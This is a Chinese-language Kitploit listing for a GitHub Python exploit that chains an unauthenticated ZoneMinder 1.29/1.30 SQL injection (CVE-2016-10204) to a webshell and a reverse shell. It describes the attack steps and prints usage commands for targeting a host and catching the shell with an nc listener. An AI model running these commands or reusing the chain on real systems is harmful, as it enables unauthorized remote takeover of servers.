Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
zoneminder-1.29-1.30-rce-exploit — 针对 ZoneMinder 1.29/1.30 的未认证 SQL 注入到 RCE 漏洞利用(CVE-2016-10204,EDB-41239)。Python 编写的单命令 SQLi 到 webshell 再到反向 shell 的 PoC。 | Kitploit
工具/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试命令与控制Payload 开发
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

针对 ZoneMinder 1.29/1.30 的未认证 SQL 注入到 RCE 漏洞利用(CVE-2016-10204,EDB-41239)。Python 编写的单命令 SQLi 到 webshell 再到反向 shell 的 PoC。

查看仓库
18小时3分前尚未审核
分享

ZoneMinder 1.29/1.30 SQLi 到 RCE 漏洞利用

一个可直接运行的 Python 漏洞利用工具,针对 ZoneMinder 1.29/1.30,将未认证的 SQL 注入(CVE-2016-10204,EDB-41239)一路串联到交互式反向 shell。

这是一个针对已知且已修补的 CVE 的武器化/自动化 PoC,并非新的漏洞利用。

该漏洞的 EDB PoC 止步于 SQLi 载荷,或者只是“把 sqlmap 指向它”。本漏洞利用工具将完整的 SQLi 到 webshell 再到 shell 链条打包成一个可读的脚本。

功能说明

  1. 通过基于时间(SLEEP)的探测,对 index.php?view=request&request=log&task=query 的 limit POST 参数确认注入点。
  2. 通过 SELECT ... INTO DUMPFILE 将一个小的 PHP webshell 写入 Web 根目录,尝试多个常见的 ZoneMinder/Apache 路径。
  3. 探测可用的 webshell,然后向你的 netcat 监听器发起 bash 反向 shell。

它处理的两个坑

  • 使用 DUMPFILE,而非 。 会转义换行符并破坏多行 PHP; 写入原始字节,因此 webshell 保持有效。
OUTFILE
OUTFILE
DUMPFILE
  • 每次运行使用新的随机文件名。 MySQL 拒绝覆盖已存在的文件,因此固定文件名会与之前运行遗留的旧文件冲突。
  • 使用方法

    root@kitploit:~
    # 弹出 shell
    python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
    
    # 在提示时,在另一个终端启动你的监听器
    sudo nc -lvnp 443
    
    # 之后,删除它投放的 webshell(名称会在最后打印出来)
    python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
    

    致谢

    • FOXMOLE(CVE-2016-10204 的公告依据)。
    • 原始 PoC:Exploit-DB 41239。

    许可证

    MIT,参见 LICENSE。

    下载工具